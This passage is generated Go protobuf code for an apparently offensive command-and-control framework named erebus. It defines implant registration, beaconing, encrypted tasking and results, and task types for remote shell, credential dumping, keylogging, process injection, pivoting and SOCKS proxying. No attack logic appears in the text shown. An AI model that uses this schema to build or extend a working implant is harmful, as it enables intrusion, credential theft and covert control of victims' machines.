// Code generated by protoc-gen-go. DO NOT EDIT.
// versions:
// 	protoc-gen-go v1.36.11
// 	protoc        v5.28.3
// source: c2.proto

package pb

import (
	protoreflect "google.golang.org/protobuf/reflect/protoreflect"
	protoimpl "google.golang.org/protobuf/runtime/protoimpl"
	reflect "reflect"
	sync "sync"
	unsafe "unsafe"
)

const (
	// Verify that this generated code is sufficiently up-to-date.
	_ = protoimpl.EnforceVersion(20 - protoimpl.MinVersion)
	// Verify that runtime/protoimpl is sufficiently up-to-date.
	_ = protoimpl.EnforceVersion(protoimpl.MaxVersion - 20)
)

type TaskType int32

const (
	TaskType_TASK_UNKNOWN       TaskType = 0
	TaskType_TASK_SHELL         TaskType = 1
	TaskType_TASK_FILE_DOWNLOAD TaskType = 2
	TaskType_TASK_FILE_UPLOAD   TaskType = 3
	TaskType_TASK_PROCESS_LIST  TaskType = 4
	TaskType_TASK_PROCESS_KILL  TaskType = 5
	TaskType_TASK_NET_IFCONFIG  TaskType = 6
	TaskType_TASK_NET_PORTSCAN  TaskType = 7
	TaskType_TASK_CREDS_DUMP    TaskType = 8
	TaskType_TASK_SCREENSHOT    TaskType = 9
	TaskType_TASK_KEYLOG_START  TaskType = 10
	TaskType_TASK_KEYLOG_STOP   TaskType = 11
	TaskType_TASK_KEYLOG_DUMP   TaskType = 12
	TaskType_TASK_PIVOT_START   TaskType = 13
	TaskType_TASK_PIVOT_STOP    TaskType = 14
	TaskType_TASK_INJECT        TaskType = 15
	TaskType_TASK_PE_LOAD       TaskType = 16
	TaskType_TASK_SOCKS_START   TaskType = 17
	TaskType_TASK_SOCKS_STOP    TaskType = 18
	TaskType_TASK_EXIT          TaskType = 19
	TaskType_TASK_SLEEP         TaskType = 20
	TaskType_TASK_MODULE        TaskType = 21
)

// Enum value maps for TaskType.
var (
	TaskType_name = map[int32]string{
		0:  "TASK_UNKNOWN",
		1:  "TASK_SHELL",
		2:  "TASK_FILE_DOWNLOAD",
		3:  "TASK_FILE_UPLOAD",
		4:  "TASK_PROCESS_LIST",
		5:  "TASK_PROCESS_KILL",
		6:  "TASK_NET_IFCONFIG",
		7:  "TASK_NET_PORTSCAN",
		8:  "TASK_CREDS_DUMP",
		9:  "TASK_SCREENSHOT",
		10: "TASK_KEYLOG_START",
		11: "TASK_KEYLOG_STOP",
		12: "TASK_KEYLOG_DUMP",
		13: "TASK_PIVOT_START",
		14: "TASK_PIVOT_STOP",
		15: "TASK_INJECT",
		16: "TASK_PE_LOAD",
		17: "TASK_SOCKS_START",
		18: "TASK_SOCKS_STOP",
		19: "TASK_EXIT",
		20: "TASK_SLEEP",
		21: "TASK_MODULE",
	}
	TaskType_value = map[string]int32{
		"TASK_UNKNOWN":       0,
		"TASK_SHELL":         1,
		"TASK_FILE_DOWNLOAD": 2,
		"TASK_FILE_UPLOAD":   3,
		"TASK_PROCESS_LIST":  4,
		"TASK_PROCESS_KILL":  5,
		"TASK_NET_IFCONFIG":  6,
		"TASK_NET_PORTSCAN":  7,
		"TASK_CREDS_DUMP":    8,
		"TASK_SCREENSHOT":    9,
		"TASK_KEYLOG_START":  10,
		"TASK_KEYLOG_STOP":   11,
		"TASK_KEYLOG_DUMP":   12,
		"TASK_PIVOT_START":   13,
		"TASK_PIVOT_STOP":    14,
		"TASK_INJECT":        15,
		"TASK_PE_LOAD":       16,
		"TASK_SOCKS_START":   17,
		"TASK_SOCKS_STOP":    18,
		"TASK_EXIT":          19,
		"TASK_SLEEP":         20,
		"TASK_MODULE":        21,
	}
)

func (x TaskType) Enum() *TaskType {
	p := new(TaskType)
	*p = x
	return p
}

func (x TaskType) String() string {
	return protoimpl.X.EnumStringOf(x.Descriptor(), protoreflect.EnumNumber(x))
}

func (TaskType) Descriptor() protoreflect.EnumDescriptor {
	return file_c2_proto_enumTypes[0].Descriptor()
}

func (TaskType) Type() protoreflect.EnumType {
	return &file_c2_proto_enumTypes[0]
}

func (x TaskType) Number() protoreflect.EnumNumber {
	return protoreflect.EnumNumber(x)
}

// Deprecated: Use TaskType.Descriptor instead.
func (TaskType) EnumDescriptor() ([]byte, []int) {
	return file_c2_proto_rawDescGZIP(), []int{0}
}

type Register struct {
	state          protoimpl.MessageState `protogen:"open.v1"`
	ImplantId      string                 `protobuf:"bytes,1,opt,name=implant_id,json=implantId,proto3" json:"implant_id,omitempty"`
	Hostname       string                 `protobuf:"bytes,2,opt,name=hostname,proto3" json:"hostname,omitempty"`
	Username       string                 `protobuf:"bytes,3,opt,name=username,proto3" json:"username,omitempty"`
	Os             string                 `protobuf:"bytes,4,opt,name=os,proto3" json:"os,omitempty"`
	Arch           string                 `protobuf:"bytes,5,opt,name=arch,proto3" json:"arch,omitempty"`
	Pid            uint32                 `protobuf:"varint,6,opt,name=pid,proto3" json:"pid,omitempty"`
	IntegrityLevel string                 `protobuf:"bytes,7,opt,name=integrity_level,json=integrityLevel,proto3" json:"integrity_level,omitempty"`
	Timestamp      int64                  `protobuf:"varint,8,opt,name=timestamp,proto3" json:"timestamp,omitempty"`
	Hmac           []byte                 `protobuf:"bytes,9,opt,name=hmac,proto3" json:"hmac,omitempty"` // HMAC-SHA256(secret, implant_id + timestamp)
	unknownFields  protoimpl.UnknownFields
	sizeCache      protoimpl.SizeCache
}

func (x *Register) Reset() {
	*x = Register{}
	mi := &file_c2_proto_msgTypes[0]
	ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x))
	ms.StoreMessageInfo(mi)
}

func (x *Register) String() string {
	return protoimpl.X.MessageStringOf(x)
}

func (*Register) ProtoMessage() {}

func (x *Register) ProtoReflect() protoreflect.Message {
	mi := &file_c2_proto_msgTypes[0]
	if x != nil {
		ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x))
		if ms.LoadMessageInfo() == nil {
			ms.StoreMessageInfo(mi)
		}
		return ms
	}
	return mi.MessageOf(x)
}

// Deprecated: Use Register.ProtoReflect.Descriptor instead.
func (*Register) Descriptor() ([]byte, []int) {
	return file_c2_proto_rawDescGZIP(), []int{0}
}

func (x *Register) GetImplantId() string {
	if x != nil {
		return x.ImplantId
	}
	return ""
}

func (x *Register) GetHostname() string {
	if x != nil {
		return x.Hostname
	}
	return ""
}

func (x *Register) GetUsername() string {
	if x != nil {
		return x.Username
	}
	return ""
}

func (x *Register) GetOs() string {
	if x != nil {
		return x.Os
	}
	return ""
}

func (x *Register) GetArch() string {
	if x != nil {
		return x.Arch
	}
	return ""
}

func (x *Register) GetPid() uint32 {
	if x != nil {
		return x.Pid
	}
	return 0
}

func (x *Register) GetIntegrityLevel() string {
	if x != nil {
		return x.IntegrityLevel
	}
	return ""
}

func (x *Register) GetTimestamp() int64 {
	if x != nil {
		return x.Timestamp
	}
	return 0
}

func (x *Register) GetHmac() []byte {
	if x != nil {
		return x.Hmac
	}
	return nil
}

type RegisterResponse struct {
	state               protoimpl.MessageState `protogen:"open.v1"`
	Success             bool                   `protobuf:"varint,1,opt,name=success,proto3" json:"success,omitempty"`
	SessionId           string                 `protobuf:"bytes,2,opt,name=session_id,json=sessionId,proto3" json:"session_id,omitempty"`
	NextCheckinMs       int64                  `protobuf:"varint,3,opt,name=next_checkin_ms,json=nextCheckinMs,proto3" json:"next_checkin_ms,omitempty"`
	EncryptedSessionKey []byte                 `protobuf:"bytes,4,opt,name=encrypted_session_key,json=encryptedSessionKey,proto3" json:"encrypted_session_key,omitempty"` // AES session key encrypted with pre-shared secret
	unknownFields       protoimpl.UnknownFields
	sizeCache           protoimpl.SizeCache
}

func (x *RegisterResponse) Reset() {
	*x = RegisterResponse{}
	mi := &file_c2_proto_msgTypes[1]
	ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x))
	ms.StoreMessageInfo(mi)
}

func (x *RegisterResponse) String() string {
	return protoimpl.X.MessageStringOf(x)
}

func (*RegisterResponse) ProtoMessage() {}

func (x *RegisterResponse) ProtoReflect() protoreflect.Message {
	mi := &file_c2_proto_msgTypes[1]
	if x != nil {
		ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x))
		if ms.LoadMessageInfo() == nil {
			ms.StoreMessageInfo(mi)
		}
		return ms
	}
	return mi.MessageOf(x)
}

// Deprecated: Use RegisterResponse.ProtoReflect.Descriptor instead.
func (*RegisterResponse) Descriptor() ([]byte, []int) {
	return file_c2_proto_rawDescGZIP(), []int{1}
}

func (x *RegisterResponse) GetSuccess() bool {
	if x != nil {
		return x.Success
	}
	return false
}

func (x *RegisterResponse) GetSessionId() string {
	if x != nil {
		return x.SessionId
	}
	return ""
}

func (x *RegisterResponse) GetNextCheckinMs() int64 {
	if x != nil {
		return x.NextCheckinMs
	}
	return 0
}

func (x *RegisterResponse) GetEncryptedSessionKey() []byte {
	if x != nil {
		return x.EncryptedSessionKey
	}
	return nil
}

type Beacon struct {
	state            protoimpl.MessageState `protogen:"open.v1"`
	ImplantId        string                 `protobuf:"bytes,1,opt,name=implant_id,json=implantId,proto3" json:"implant_id,omitempty"`
	SessionId        string                 `protobuf:"bytes,2,opt,name=session_id,json=sessionId,proto3" json:"session_id,omitempty"`
	Timestamp        int64                  `protobuf:"varint,3,opt,name=timestamp,proto3" json:"timestamp,omitempty"`
	Hmac             []byte                 `protobuf:"bytes,4,opt,name=hmac,proto3" json:"hmac,omitempty"`
	Results          []*TaskResult          `protobuf:"bytes,5,rep,name=results,proto3" json:"results,omitempty"`
	EncryptedResults []byte                 `protobuf:"bytes,6,opt,name=encrypted_results,json=encryptedResults,proto3" json:"encrypted_results,omitempty"` // replaces results when session key active
	unknownFields    protoimpl.UnknownFields
	sizeCache        protoimpl.SizeCache
}

func (x *Beacon) Reset() {
	*x = Beacon{}
	mi := &file_c2_proto_msgTypes[2]
	ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x))
	ms.StoreMessageInfo(mi)
}

func (x *Beacon) String() string {
	return protoimpl.X.MessageStringOf(x)
}

func (*Beacon) ProtoMessage() {}

func (x *Beacon) ProtoReflect() protoreflect.Message {
	mi := &file_c2_proto_msgTypes[2]
	if x != nil {
		ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x))
		if ms.LoadMessageInfo() == nil {
			ms.StoreMessageInfo(mi)
		}
		return ms
	}
	return mi.MessageOf(x)
}

// Deprecated: Use Beacon.ProtoReflect.Descriptor instead.
func (*Beacon) Descriptor() ([]byte, []int) {
	return file_c2_proto_rawDescGZIP(), []int{2}
}

func (x *Beacon) GetImplantId() string {
	if x != nil {
		return x.ImplantId
	}
	return ""
}

func (x *Beacon) GetSessionId() string {
	if x != nil {
		return x.SessionId
	}
	return ""
}

func (x *Beacon) GetTimestamp() int64 {
	if x != nil {
		return x.Timestamp
	}
	return 0
}

func (x *Beacon) GetHmac() []byte {
	if x != nil {
		return x.Hmac
	}
	return nil
}

func (x *Beacon) GetResults() []*TaskResult {
	if x != nil {
		return x.Results
	}
	return nil
}

func (x *Beacon) GetEncryptedResults() []byte {
	if x != nil {
		return x.EncryptedResults
	}
	return nil
}

type BeaconResponse struct {
	state          protoimpl.MessageState `protogen:"open.v1"`
	Tasks          []*Task                `protobuf:"bytes,1,rep,name=tasks,proto3" json:"tasks,omitempty"`
	NextCheckinMs  int64                  `protobuf:"varint,2,opt,name=next_checkin_ms,json=nextCheckinMs,proto3" json:"next_checkin_ms,omitempty"`
	Terminate      bool                   `protobuf:"varint,3,opt,name=terminate,proto3" json:"terminate,omitempty"`
	EncryptedTasks []byte                 `protobuf:"bytes,4,opt,name=encrypted_tasks,json=encryptedTasks,proto3" json:"encrypted_tasks,omitempty"` // replaces tasks when session key active
	unknownFields  protoimpl.UnknownFields
	sizeCache      protoimpl.SizeCache
}

func (x *BeaconResponse) Reset() {
	*x = BeaconResponse{}
	mi := &file_c2_proto_msgTypes[3]
	ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x))
	ms.StoreMessageInfo(mi)
}

func (x *BeaconResponse) String() string {
	return protoimpl.X.MessageStringOf(x)
}

func (*BeaconResponse) ProtoMessage() {}

func (x *BeaconResponse) ProtoReflect() protoreflect.Message {
	mi := &file_c2_proto_msgTypes[3]
	if x != nil {
		ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x))
		if ms.LoadMessageInfo() == nil {
			ms.StoreMessageInfo(mi)
		}
		return ms
	}
	return mi.MessageOf(x)
}

// Deprecated: Use BeaconResponse.ProtoReflect.Descriptor instead.
func (*BeaconResponse) Descriptor() ([]byte, []int) {
	return file_c2_proto_rawDescGZIP(), []int{3}
}

func (x *BeaconResponse) GetTasks() []*Task {
	if x != nil {
		return x.Tasks
	}
	return nil
}

func (x *BeaconResponse) GetNextCheckinMs() int64 {
	if x != nil {
		return x.NextCheckinMs
	}
	return 0
}

func (x *BeaconResponse) GetTerminate() bool {
	if x != nil {
		return x.Terminate
	}
	return false
}

func (x *BeaconResponse) GetEncryptedTasks() []byte {
	if x != nil {
		return x.EncryptedTasks
	}
	return nil
}

type Task struct {
	state         protoimpl.MessageState `protogen:"open.v1"`
	TaskId        string                 `protobuf:"bytes,1,opt,name=task_id,json=taskId,proto3" json:"task_id,omitempty"`
	ImplantId     string                 `protobuf:"bytes,2,opt,name=implant_id,json=implantId,proto3" json:"implant_id,omitempty"`
	TaskType      TaskType               `protobuf:"varint,3,opt,name=task_type,json=taskType,proto3,enum=erebus.c2.TaskType" json:"task_type,omitempty"`
	Data          []byte                 `protobuf:"bytes,4,opt,name=data,proto3" json:"data,omitempty"` // Serialized per-task payload
	TimeoutMs     int64                  `protobuf:"varint,5,opt,name=timeout_ms,json=timeoutMs,proto3" json:"timeout_ms,omitempty"`
	unknownFields protoimpl.UnknownFields
	sizeCache     protoimpl.SizeCache
}

func (x *Task) Reset() {
	*x = Task{}
	mi := &file_c2_proto_msgTypes[4]
	ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x))
	ms.StoreMessageInfo(mi)
}

func (x *Task) String() string {
	return protoimpl.X.MessageStringOf(x)
}

func (*Task) ProtoMessage() {}

func (x *Task) ProtoReflect() protoreflect.Message {
	mi := &file_c2_proto_msgTypes[4]
	if x != nil {
		ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x))
		if ms.LoadMessageInfo() == nil {
			ms.StoreMessageInfo(mi)
		}
		return ms
	}
	return mi.MessageOf(x)
}

// Deprecated: Use Task.ProtoReflect.Descriptor instead.
func (*Task) Descriptor() ([]byte, []int) {
	return file_c2_proto_rawDescGZIP(), []int{4}
}

func (x *Task) GetTaskId() string {
	if x != nil {
		return x.TaskId
	}
	return ""
}

func (x *Task) GetImplantId() string {
	if x != nil {
		return x.ImplantId
	}
	return ""
}

func (x *Task) GetTaskType() TaskType {
	if x != nil {
		return x.TaskType
	}
	return TaskType_TASK_UNKNOWN
}

func (x *Task) GetData() []byte {
	if x != nil {
		return x.Data
	}
	return nil
}

func (x *Task) GetTimeoutMs() int64 {
	if x != nil {
		return x.TimeoutMs
	}
	return 0
}

type TaskResult struct {
	state           protoimpl.MessageState `protogen:"open.v1"`
	TaskId          string                 `protobuf:"bytes,1,opt,name=task_id,json=taskId,proto3" json:"task_id,omitempty"`
	Success         bool                   `protobuf:"varint,2,opt,name=success,proto3" json:"success,omitempty"`
	Data            []byte                 `protobuf:"bytes,3,opt,name=data,proto3" json:"data,omitempty"` // Serialized per-task result
	Error           string                 `protobuf:"bytes,4,opt,name=error,proto3" json:"error,omitempty"`
	ExecutionTimeMs int64                  `protobuf:"varint,5,opt,name=execution_time_ms,json=executionTimeMs,proto3" json:"execution_time_ms,omitempty"`
	unknownFields   protoimpl.UnknownFields
	sizeCache       protoimpl.SizeCache
}

func (x *TaskResult) Reset() {
	*x = TaskResult{}
	mi := &file_c2_proto_msgTypes[5]
	ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x))
	ms.StoreMessageInfo(mi)
}

func (x *TaskResult) String() string {
	return protoimpl.X.MessageStringOf(x)
}

func (*TaskResult) ProtoMessage() {}

func (x *TaskResult) ProtoReflect() protoreflect.Message {
	mi := &file_c2_proto_msgTypes[5]
	if x != nil {
		ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x))
		if ms.LoadMessageInfo() == nil {
			ms.StoreMessageInfo(mi)
		}
		return ms
	}
	return mi.MessageOf(x)
}

// Deprecated: Use TaskResult.ProtoReflect.Descriptor instead.
func (*TaskResult) Descriptor() ([]byte, []int) {
	return file_c2_proto_rawDescGZIP(), []int{5}
}

func (x *TaskResult) GetTaskId() string {
	if x != nil {
		return x.TaskId
	}
	return ""
}

func (x *TaskResult) GetSuccess() bool {
	if x != nil {
		return x.Success
	}
	return false
}

func (x *TaskResult) GetData() []byte {
	if x != nil {
		return x.Data
	}
	return nil
}

func (x *TaskResult) GetError() string {
	if x != nil {
		return x.Error
	}
	return ""
}

func (x *TaskResult) GetExecutionTimeMs() int64 {
	if x != nil {
		return x.ExecutionTimeMs
	}
	return 0
}

// Helper messages for encrypted payloads
type BeaconResultsPayload struct {
	state         protoimpl.MessageState `protogen:"open.v1"`
	Results       []*TaskResult          `protobuf:"bytes,1,rep,name=results,proto3" json:"results,omitempty"`
	unknownFields protoimpl.UnknownFields
	sizeCache     protoimpl.SizeCache
}

func (x *BeaconResultsPayload) Reset() {
	*x = BeaconResultsPayload{}
	mi := &file_c2_proto_msgTypes[6]
	ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x))
	ms.StoreMessageInfo(mi)
}

func (x *BeaconResultsPayload) String() string {
	return protoimpl.X.MessageStringOf(x)
}

func (*BeaconResultsPayload) ProtoMessage() {}

func (x *BeaconResultsPayload) ProtoReflect() protoreflect.Message {
	mi := &file_c2_proto_msgTypes[6]
	if x != nil {
		ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x))
		if ms.LoadMessageInfo() == nil {
			ms.StoreMessageInfo(mi)
		}
		return ms
	}
	return mi.MessageOf(x)
}

// Deprecated: Use BeaconResultsPayload.ProtoReflect.Descriptor instead.
func (*BeaconResultsPayload) Descriptor() ([]byte, []int) {
	return file_c2_proto_rawDescGZIP(), []int{6}
}

func (x *BeaconResultsPayload) GetResults() []*TaskResult {
	if x != nil {
		return x.Results
	}
	return nil
}

type BeaconTasksPayload struct {
	state         protoimpl.MessageState `protogen:"open.v1"`
	Tasks         []*Task                `protobuf:"bytes,1,rep,name=tasks,proto3" json:"tasks,omitempty"`
	unknownFields protoimpl.UnknownFields
	sizeCache     protoimpl.SizeCache
}

func (x *BeaconTasksPayload) Reset() {
	*x = BeaconTasksPayload{}
	mi := &file_c2_proto_msgTypes[7]
	ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x))
	ms.StoreMessageInfo(mi)
}

func (x *BeaconTasksPayload) String() string {
	return protoimpl.X.MessageStringOf(x)
}

func (*BeaconTasksPayload) ProtoMessage() {}

func (x *BeaconTasksPayload) ProtoReflect() protoreflect.Message {
	mi := &file_c2_proto_msgTypes[7]
	if x != nil {
		ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x))
		if ms.LoadMessageInfo() == nil {
			ms.StoreMessageInfo(mi)
		}
		return ms
	}
	return mi.MessageOf(x)
}

// Deprecated: Use BeaconTasksPayload.ProtoReflect.Descriptor instead.
func (*BeaconTasksPayload) Descriptor() ([]byte, []int) {
	return file_c2_proto_rawDescGZIP(), []int{7}
}

func (x *BeaconTasksPayload) GetTasks() []*Task {
	if x != nil {
		return x.Tasks
	}
	return nil
}

type ShellTask struct {
	state         protoimpl.MessageState `protogen:"open.v1"`
	Command       string                 `protobuf:"bytes,1,opt,name=command,proto3" json:"command,omitempty"`
	Args          []string               `protobuf:"bytes,2,rep,name=args,proto3" json:"args,omitempty"`
	unknownFields protoimpl.UnknownFields
	sizeCache     protoimpl.SizeCache
}

func (x *ShellTask) Reset() {
	*x = ShellTask{}
	mi := &file_c2_proto_msgTypes[8]
	ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x))
	ms.StoreMessageInfo(mi)
}

func (x *ShellTask) String() string {
	return protoimpl.X.MessageStringOf(x)
}

func (*ShellTask) ProtoMessage() {}

func (x *ShellTask) ProtoReflect() protoreflect.Message {
	mi := &file_c2_proto_msgTypes[8]
	if x != nil {
		ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x))
		if ms.LoadMessageInfo() == nil {
			ms.StoreMessageInfo(mi)
		}
		return ms
	}
	return mi.MessageOf(x)
}

// Deprecated: Use ShellTask.ProtoReflect.Descriptor instead.
func (*ShellTask) Descriptor() ([]byte, []int) {
	return file_c2_proto_rawDescGZIP(), []int{8}
}

func (x *ShellTask) GetCommand() string {
	if x != nil {
		return x.Command
	}
	return ""
}

func (x *ShellTask) GetArgs() []string {
	if x != nil {
		return x.Args
	}
	return nil
}

type ShellResult struct {
	state         protoimpl.MessageState `protogen:"open.v1"`
	Stdout        string                 `protobuf:"bytes,1,opt,name=stdout,proto3" json:"stdout,omitempty"`
	Stderr        string                 `protobuf:"bytes,2,opt,name=stderr,proto3" json:"stderr,omitempty"`
	ExitCode      int32                  `protobuf:"varint,3,opt,name=exit_code,json=exitCode,proto3" json:"exit_code,omitempty"`
	unknownFields protoimpl.UnknownFields
	sizeCache     protoimpl.SizeCache
}

func (x *ShellResult) Reset() {
	*x = ShellResult{}
	mi := &file_c2_proto_msgTypes[9]
	ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x))
	ms.StoreMessageInfo(mi)
}

func (x *ShellResult) String() string {
	return protoimpl.X.MessageStringOf(x)
}

func (*ShellResult) ProtoMessage() {}

func (x *ShellResult) ProtoReflect() protoreflect.Message {
	mi := &file_c2_proto_msgTypes[9]
	if x != nil {
		ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x))
		if ms.LoadMessageInfo() == nil {
			ms.StoreMessageInfo(mi)
		}
		return ms
	}
	return mi.MessageOf(x)
}

// Deprecated: Use ShellResult.ProtoReflect.Descriptor instead.
func (*ShellResult) Descriptor() ([]byte, []int) {
	return file_c2_proto_rawDescGZIP(), []int{9}
}

func (x *ShellResult) GetStdout() string {
	if x != nil {
		return x.Stdout
	}
	return ""
}

func (x *ShellResult) GetStderr() string {
	if x != nil {
		return x.Stderr
	}
	return ""
}

func (x *ShellResult) GetExitCode() int32 {
	if x != nil {
		return x.ExitCode
	}
	return 0
}

// Phase 2+ task payloads (stubs)
type FileDownloadTask struct {
	state         protoimpl.MessageState `protogen:"open.v1"`
	RemotePath    string                 `protobuf:"bytes,1,opt,name=remote_path,json=remotePath,proto3" json:"remote_path,omitempty"`
	unknownFields protoimpl.UnknownFields
	sizeCache     protoimpl.SizeCache
}

func (x *FileDownloadTask) Reset() {
	*x = FileDownloadTask{}
	mi := &file_c2_proto_msgTypes[10]
	ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x))
	ms.StoreMessageInfo(mi)
}

func (x *FileDownloadTask) String() string {
	return protoimpl.X.MessageStringOf(x)
}

func (*FileDownloadTask) ProtoMessage() {}

func (x *FileDownloadTask) ProtoReflect() protoreflect.Message {
	mi := &file_c2_proto_msgTypes[10]
	if x != nil {
		ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x))
		if ms.LoadMessageInfo() == nil {
			ms.StoreMessageInfo(mi)
		}
		return ms
	}
	return mi.MessageOf(x)
}

// Deprecated: Use FileDownloadTask.ProtoReflect.Descriptor instead.
func (*FileDownloadTask) Descriptor() ([]byte, []int) {
	return file_c2_proto_rawDescGZIP(), []int{10}
}

func (x *FileDownloadTask) GetRemotePath() string {
	if x != nil {
		return x.RemotePath
	}
	return ""
}

type FileDownloadResult struct {
	state         protoimpl.MessageState `protogen:"open.v1"`
	Filename      string                 `protobuf:"bytes,1,opt,name=filename,proto3" json:"filename,omitempty"`
	Data          []byte                 `protobuf:"bytes,2,opt,name=data,proto3" json:"data,omitempty"`
	unknownFields protoimpl.UnknownFields
	sizeCache     protoimpl.SizeCache
}

func (x *FileDownloadResult) Reset() {
	*x = FileDownloadResult{}
	mi := &file_c2_proto_msgTypes[11]
	ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x))
	ms.StoreMessageInfo(mi)
}

func (x *FileDownloadResult) String() string {
	return protoimpl.X.MessageStringOf(x)
}

func (*FileDownloadResult) ProtoMessage() {}

func (x *FileDownloadResult) ProtoReflect() protoreflect.Message {
	mi := &file_c2_proto_msgTypes[11]
	if x != nil {
		ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x))
		if ms.LoadMessageInfo() == nil {
			ms.StoreMessageInfo(mi)
		}
		return ms
	}
	return mi.MessageOf(x)
}

// Deprecated: Use FileDownloadResult.ProtoReflect.Descriptor instead.
func (*FileDownloadResult) Descriptor() ([]byte, []int) {
	return file_c2_proto_rawDescGZIP(), []int{11}
}

func (x *FileDownloadResult) GetFilename() string {
	if x != nil {
		return x.Filename
	}
	return ""
}

func (x *FileDownloadResult) GetData() []byte {
	if x != nil {
		return x.Data
	}
	return nil
}

type FileUploadTask struct {
	state         protoimpl.MessageState `protogen:"open.v1"`
	RemotePath    string                 `protobuf:"bytes,1,opt,name=remote_path,json=remotePath,proto3" json:"remote_path,omitempty"`
	Data          []byte                 `protobuf:"bytes,2,opt,name=data,proto3" json:"data,omitempty"`
	unknownFields protoimpl.UnknownFields
	sizeCache     protoimpl.SizeCache
}

func (x *FileUploadTask) Reset() {
	*x = FileUploadTask{}
	mi := &file_c2_proto_msgTypes[12]
	ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x))
	ms.StoreMessageInfo(mi)
}

func (x *FileUploadTask) String() string {
	return protoimpl.X.MessageStringOf(x)
}

func (*FileUploadTask) ProtoMessage() {}

func (x *FileUploadTask) ProtoReflect() protoreflect.Message {
	mi := &file_c2_proto_msgTypes[12]
	if x != nil {
		ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x))
		if ms.LoadMessageInfo() == nil {
			ms.StoreMessageInfo(mi)
		}
		return ms
	}
	return mi.MessageOf(x)
}

// Deprecated: Use FileUploadTask.ProtoReflect.Descriptor instead.
func (*FileUploadTask) Descriptor() ([]byte, []int) {
	return file_c2_proto_rawDescGZIP(), []int{12}
}

func (x *FileUploadTask) GetRemotePath() string {
	if x != nil {
		return x.RemotePath
	}
	return ""
}

func (x *FileUploadTask) GetData() []byte {
	if x != nil {
		return x.Data
	}
	return nil
}

type FileUploadResult struct {
	state         protoimpl.MessageState `protogen:"open.v1"`
	Success       bool                   `protobuf:"varint,1,opt,name=success,proto3" json:"success,omitempty"`
	unknownFields protoimpl.UnknownFields
	sizeCache     protoimpl.SizeCache
}

func (x *FileUploadResult) Reset() {
	*x = FileUploadResult{}
	mi := &file_c2_proto_msgTypes[13]
	ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x))
	ms.StoreMessageInfo(mi)
}

func (x *FileUploadResult) String() string {
	return protoimpl.X.MessageStringOf(x)
}

func (*FileUploadResult) ProtoMessage() {}

func (x *FileUploadResult) ProtoReflect() protoreflect.Message {
	mi := &file_c2_proto_msgTypes[13]
	if x != nil {
		ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x))
		if ms.LoadMessageInfo() == nil {
			ms.StoreMessageInfo(mi)
		}
		return ms
	}
	return mi.MessageOf(x)
}

// Deprecated: Use FileUploadResult.ProtoReflect.Descriptor instead.
func (*FileUploadResult) Descriptor() ([]byte, []int) {
	return file_c2_proto_rawDescGZIP(), []int{13}
}

func (x *FileUploadResult) GetSuccess() bool {
	if x != nil {
		return x.Success
	}
	return false
}

type SleepTask struct {
	state         protoimpl.MessageState `protogen:"open.v1"`
	SleepMs       int64                  `protobuf:"varint,1,opt,name=sleep_ms,json=sleepMs,proto3" json:"sleep_ms,omitempty"`
	JitterPct     int32                  `protobuf:"varint,2,opt,name=jitter_pct,json=jitterPct,proto3" json:"jitter_pct,omitempty"`
	unknownFields protoimpl.UnknownFields
	sizeCache     protoimpl.SizeCache
}

func (x *SleepTask) Reset() {
	*x = SleepTask{}
	mi := &file_c2_proto_msgTypes[14]
	ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x))
	ms.StoreMessageInfo(mi)
}

func (x *SleepTask) String() string {
	return protoimpl.X.MessageStringOf(x)
}

func (*SleepTask) ProtoMessage() {}

func (x *SleepTask) ProtoReflect() protoreflect.Message {
	mi := &file_c2_proto_msgTypes[14]
	if x != nil {
		ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x))
		if ms.LoadMessageInfo() == nil {
			ms.StoreMessageInfo(mi)
		}
		return ms
	}
	return mi.MessageOf(x)
}

// Deprecated: Use SleepTask.ProtoReflect.Descriptor instead.
func (*SleepTask) Descriptor() ([]byte, []int) {
	return file_c2_proto_rawDescGZIP(), []int{14}
}

func (x *SleepTask) GetSleepMs() int64 {
	if x != nil {
		return x.SleepMs
	}
	return 0
}

func (x *SleepTask) GetJitterPct() int32 {
	if x != nil {
		return x.JitterPct
	}
	return 0
}

type ModuleTask struct {
	state         protoimpl.MessageState `protogen:"open.v1"`
	ModuleName    string                 `protobuf:"bytes,1,opt,name=module_name,json=moduleName,proto3" json:"module_name,omitempty"`
	Config        []byte                 `protobuf:"bytes,2,opt,name=config,proto3" json:"config,omitempty"`
	unknownFields protoimpl.UnknownFields
	sizeCache     protoimpl.SizeCache
}

func (x *ModuleTask) Reset() {
	*x = ModuleTask{}
	mi := &file_c2_proto_msgTypes[15]
	ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x))
	ms.StoreMessageInfo(mi)
}

func (x *ModuleTask) String() string {
	return protoimpl.X.MessageStringOf(x)
}

func (*ModuleTask) ProtoMessage() {}

func (x *ModuleTask) ProtoReflect() protoreflect.Message {
	mi := &file_c2_proto_msgTypes[15]
	if x != nil {
		ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x))
		if ms.LoadMessageInfo() == nil {
			ms.StoreMessageInfo(mi)
		}
		return ms
	}
